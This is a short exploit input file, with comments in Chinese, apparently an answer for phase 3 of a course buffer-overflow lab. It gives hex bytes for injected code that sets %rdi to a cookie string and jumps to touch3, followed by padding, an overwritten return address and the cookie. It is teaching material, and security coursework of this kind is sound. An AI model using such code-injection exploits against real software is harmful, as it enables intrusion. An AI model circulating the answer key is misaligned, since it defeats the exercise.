/* Phase 3: 注入代码调用touch3(cookie_string) */
/* cookie: 0x1c2a3245 */
/* touch3地址: 0x401d19 */
/* buf地址: 0x55685ea8 (根据栈分析计算) */
/* cookie字符串地址: 0x55685ec8 (buf + 32, 返回地址之后) */
/* 注入代码: 13字节 */
48 c7 c7 c8 5e 68 55    /* movq $0x55685ec8, %rdi (指向cookie字符串) */
68 19 1d 40 00          /* pushq $0x401d19 (touch3地址) */
c3                      /* ret */
00 00 00 00 00 00 00    /* 7 bytes padding */
00 00 00 00             /* 4 bytes padding (共24字节填充缓冲区) */
a8 5e 68 55 00 00 00 00 /* 返回地址: 0x55685ea8 (buf地址, 注入代码位置) */
31 63 32 61 33 32 34 35 /* cookie字符串 "1c2a3245" */
00                      /* null终止符 */
